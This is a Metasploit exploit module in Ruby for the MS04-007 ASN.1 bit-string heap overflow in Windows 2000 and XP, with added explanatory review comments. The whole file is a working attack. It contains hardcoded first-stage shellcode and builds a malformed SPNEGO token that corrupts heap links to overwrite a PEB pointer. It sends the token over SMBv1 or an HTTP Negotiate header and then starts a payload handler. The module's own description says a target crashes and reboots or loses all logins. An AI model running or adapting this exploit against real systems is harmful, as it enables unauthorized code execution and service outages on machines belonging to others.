##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for MS04-007 (CVE-2003-0818): a heap overflow in the
  # bit-string decoder of the Microsoft ASN.1 library. The malformed structure
  # is carried inside a SPNEGO token and delivered either as the NTLMSSP blob
  # of an SMBv1 session setup or in an HTTP "Authorization: Negotiate" header,
  # selected by the PROTO option.
  #
  # Risk profile, as declared in the metadata below: LowRanking, single attempt
  # only, Stability CRASH_OS_RESTARTS / CRASH_SERVICE_DOWN, Reliability
  # UNRELIABLE_SESSION. Per the description, LSASS stops processing
  # authentication after a run, successful or not, until the host reboots.
  # The MS04-007 patch and Windows 2000 SP4 Rollup 1 remove the vulnerability.
  Rank = LowRanking

  include Msf::Exploit::Remote::SMB::Client

  # Registers module metadata, the PROTO option and removes the generic SMB
  # protocol-version option.
  #
  # @param info [Hash] caller-supplied metadata merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow',
        'Description' => %q{
This is an exploit for a previously undisclosed
vulnerability in the bit string decoding code in the
Microsoft ASN.1 library. This vulnerability is not related
to the bit string vulnerability described in eEye advisory
AD20040210-2. Both vulnerabilities were fixed in the
MS04-007 patch. Windows 2000 SP4 Rollup 1 also patches this
vulnerability.

You are only allowed one attempt with this vulnerability. If
the payload fails to execute, the LSASS system service will
crash and the target system will automatically reboot itself
in 60 seconds. If the payload succeeds, the system will no
longer be able to process authentication requests, denying
all attempts to login through SMB or at the console. A
reboot is required to restore proper functioning of an
exploited system.

This exploit has been successfully tested with the win32/*/reverse_tcp
payloads, however a few problems were encountered when using the
equivalent bind payloads. Your mileage may vary.
},
        'Author' => [ 'Solar Eclipse <solareclipse[at]phreedom.org>' ],
        'License' => BSD_LICENSE,
        'References' => [
          [ 'CVE', '2003-0818'],
          [ 'OSVDB', '3902' ],
          [ 'BID', '9633'],
          [ 'MSB', 'MS04-007'],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Privileged' => true,
        'Payload' => {
          # spnego_token re-checks these bounds: 1024 bytes plus the 8-byte
          # tag fits the 1033-byte stage-1 slot it allocates.
          'Space' => 1024,
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
            {
              'Platform' => 'win',
            },
          ],
        ],
        'Notes' => {
          'AKA' => [ 'kill-bill' ],
          'Reliability' => [ UNRELIABLE_SESSION ],
          'Stability' => [ CRASH_OS_RESTARTS, CRASH_SERVICE_DOWN ],
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        },
        'DisclosureDate' => '2004-02-10',
        'DefaultTarget' => 0
      )
    )

    # PROTO picks the transport used by #exploit; OptEnum limits it to the
    # two values that #exploit dispatches on.
    register_options [
      OptEnum.new('PROTO', [true, 'Which protocol to use', 'smb', %w[smb http]]),
    ]

    # Both transports call connect(versions: [1]), so a user-settable SMB
    # protocol version would be misleading here.
    deregister_options('SMB::ProtocolVersion')
  end

  # This exploit is too destructive to use during automated exploitation.
  # Better Windows-based exploits exist at this time (Sep 2006)
  #
  # @return [false] always; excludes the module from automated runs
  def autofilter
    false
  end

  # This is a straight port of Solar Eclipse's "kill-bill" exploit, published
  # as a Metasploit Framework module with his permission. This module is only
  # licensed under GPLv2, keep this in mind if you embed the Framework into
  # a non-GPL application. -hdm[at]metasploit.com

  # Builds the SPNEGO token from the fixed stage-0 blob and the encoded
  # payload, then sends it over the transport named by PROTO.
  #
  # NOTE(review): spnego_token returns nil (after a print_status) when one of
  # its length checks fails, and neither exploit_smb nor exploit_http guards
  # against a nil token, so such a failure would surface later as an
  # exception rather than a clean abort. With 'Space' => 1024 the checks
  # should not trigger in practice.
  def exploit
    # The first stage shellcode fixes the PEB pointer and cleans the heap
    # (author's description). Treated as an opaque byte string by this module;
    # spnego_token caps it at 1032 bytes.
    stage0 =
      "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff" +
      "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2" +
      "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00" +
      "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c" +
      "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89" +
      "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31" +
      "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4" +
      "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24" +
      "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81" +
      "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3" +
      "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31" +
      "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64" +
      "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08" +
      "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74" +
      "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb" +
      "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd" +
      "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46" +
      "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea" +
      "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee" +
      "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb" +
      "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b" +
      "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2" +
      "\x08\x00\xeb\xfe"

    token = spnego_token(stage0, payload.encoded)

    # The else arm is only reachable if PROTO bypasses the OptEnum validation;
    # note it reports via print_status rather than print_error.
    case datastore['PROTO']
    when 'smb'
      exploit_smb(token)
    when 'http'
      exploit_http(token)
    else
      print_status("Invalid application protocol specified, use smb or http")
    end
  end

  # Delivers the token as the NTLMSSP/SPNEGO blob of an SMBv1 session setup.
  #
  # @param token [String] BER-encoded SPNEGO token from #spnego_token
  def exploit_smb(token)
    # SMB1 only; the raw socket is handed to a separate Rex SMB client below.
    connect(versions: [1])

    client = Rex::Proto::SMB::Client.new(sock)

    begin
      # NOTE(review): presumably SMBDirect means a direct TCP session with no
      # NetBIOS session request -- confirm against the mixin's definition.
      client.session_request(smb_hostname()) if not datastore['SMBDirect']
      client.negotiate
      client.session_setup_with_ntlmssp_blob(token)
    rescue => e
      # The author maps this status string to "already exploited"; anything
      # else is reported verbatim. Neither branch returns, so handler and
      # disconnect below still run after an error.
      if (e.to_s =~ /error code 0x00050001/)
        print_error("The target system has already been exploited")
      else
        print_error("Error: #{e}")
      end
    end

    handler
    disconnect
  end

  # Delivers the token in an HTTP/1.0 "Authorization: Negotiate" header and
  # reads a single response to classify the outcome.
  #
  # @param token [String] BER-encoded SPNEGO token from #spnego_token
  def exploit_http(token)
    # Same connect as the SMB path; only the underlying socket is used here.
    connect(versions: [1])

    req = "GET / HTTP/1.0\r\n"
    req << "Host: #{datastore['RHOST']}\r\n"
    # The '' argument is the line delimiter, so the base64 stays on one
    # header line.
    req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"

    sock.put(req)
    # Only one read; res is nil if nothing came back, hence the guards below.
    res = sock.get_once

    # Both checks only report a status; they do not skip the handler.
    if (res and res =~ /0x80090301/)
      print_error("This server does not support the Negotiate protocol or has already been exploited")
    end

    if (res and res =~ /0x80090304/)
      print_error("This server responded with error code 0x80090304 (wth?)")
    end

    handler
    disconnect
  end

  # Returns an ASN.1 encoded string
  # (delegates to Rex; presumably prepends the BER length octets -- confirm
  # in Rex::Proto::NTLM::Utils).
  #
  # @param str [String] content octets
  # @return [String] encoded value
  def enc_asn1(str)
    Rex::Proto::NTLM::Utils::asn1encode(str)
  end

  # Returns an ASN.1 encoded bit string with 0 unused bits
  # 0x03 is the BIT STRING tag; the leading "\x00" is the unused-bits count.
  #
  # @param str [String] bit string content
  # @return [String] primitive BIT STRING encoding
  def enc_bits(str)
    "\x03" + enc_asn1("\x00" + str)
  end

  # Returns a BER encoded constructed bit string
  # 0x23 is BIT STRING (0x03) with the constructed bit (0x20) set; the
  # arguments are concatenated as the already-encoded inner elements.
  #
  # @param str_arr [Array<String>] encoded inner elements
  # @return [String] constructed BIT STRING encoding
  def enc_constr(*str_arr)
    "\x23" + enc_asn1(str_arr.join(''))
  end

  # Returns a BER encoded SPNEGO token
  #
  # Nests stage0 and stage1 inside constructed bit strings padded to fixed
  # sizes (1033, 1032 and 1040 bytes); the length checks at the top are what
  # keep that padding arithmetic non-negative. The heap-layout reasoning is
  # the author's, preserved in the comments inline.
  #
  # @param stage0 [String] first-stage shellcode, at most 1032 bytes
  # @param stage1 [String] encoded payload; tag + stage1 at most 1033 bytes
  # @return [String, nil] the token, or nil after a print_status when a
  #   parameter or bound check fails
  def spnego_token(stage0, stage1)
    if !(stage0 and stage1)
      print_status("Invalid parameters passed to spnego_token")
      return
    end

    if (stage0.length > 1032)
      print_status("The stage 0 shellcode is longer than 1032 bytes")
      return
    end

    # 8-byte marker prefixed to stage1. The same 4-byte value also appears in
    # stage0 ("\xb8\x90\x42\x90\x42"), presumably so stage0 can locate stage1
    # in memory -- confirm against the author's original.
    tag = "\x90\x42\x90\x42\x90\x42\x90\x42"

    if ((tag.length + stage1.length) > 1033)
      print_status("The stage 1 shellcode is too long")
      return
    end

    # The first two overwrites must succeed, so we write to an unused location
    # in the PEB block. We don't care about the values, because after this the
    # doubly linked list of free blocks is corrupted and we get to the second
    # overwrite which is more useful.

    fw = "\xf8\x0f\x01\x00" # 0x00010ff8
    bk = "\xf8\x0f\x01"

    # The second overwrite writes the address of our shellcode into the
    # FastPebLockRoutine pointer in the PEB

    peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB

    # Each enc_bits argument is padded to a fixed total, so the structure's
    # size does not vary with the payload length.
    bitstring = enc_constr(
      enc_bits("A" * 1024),
      "\x03\x00",
      enc_constr(
        enc_bits(tag + stage1 + ("B" * (1033 - (tag + stage1).length))),
        enc_constr(enc_bits(fw + bk)),
        enc_constr(
          enc_bits("CCCC" + peblock + stage0 + ("C" * (1032 - stage0.length))),
          enc_constr(
            # "\xeb\x06" is a short jump over the six NOPs that follow.
            enc_bits("\xeb\x06" + make_nops(6)),
            enc_bits("D" * 1040)
          )
        )
      )
    )

    token = "\x60" + enc_asn1( # Application Constructed Object
      "\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID
      "\xa0" + enc_asn1( # NegTokenInit (0xa0)
        "\x30" + enc_asn1(
          "\xa1" + enc_asn1(
            bitstring
          )
        )
      )
    )

    return token
  end
end